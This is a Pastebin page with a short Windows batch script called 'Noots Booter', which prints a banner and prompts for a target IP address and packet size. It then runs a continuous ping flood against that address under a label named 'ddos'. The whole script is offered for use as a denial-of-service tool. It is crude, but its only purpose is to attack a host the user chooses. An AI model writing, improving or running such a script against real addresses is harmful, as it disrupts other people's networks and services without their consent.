Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- color 0a
- title Noots Booter
- cls
- echo Created By Mrtennisball9
- :greetings
- ECHO M"""""""`YM dP M#"""""""'M dP
- ECHO M mmmm. M 88 ## mmmm. `M 88
- ECHO M MMMMM M .d8888b. .d8888b. d8888P .d8888b. #' .M .d8888b. .d8888b. d8888P .d8888b. 88d888b.
- ECHO M MMMMM M 88' `88 88' `88 88 Y8ooooo. M# MMMb.'YM 88' `88 88' `88 88 88ooood8 88' `88
- ECHO M MMMMM M 88. .88 88. .88 88 88 M# MMMM' M 88. .88 88. .88 88 88. ... 88
- ECHO M MMMMM M `88888P' `88888P' dP `88888P' M# .;M `88888P' `88888P' dP `88888P' dP
- ECHO MMMMMMMMMMM M#########M
- goto start
- :start:
- ping localhost >nul
- @echo please insert ip address
- set /p x=ip address:
- goto packets
- :packets:
- set /p y=packets:
- goto ddos
- :ddos:
- color 0a
- ping %x% -t -l %y%
- color 0a
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement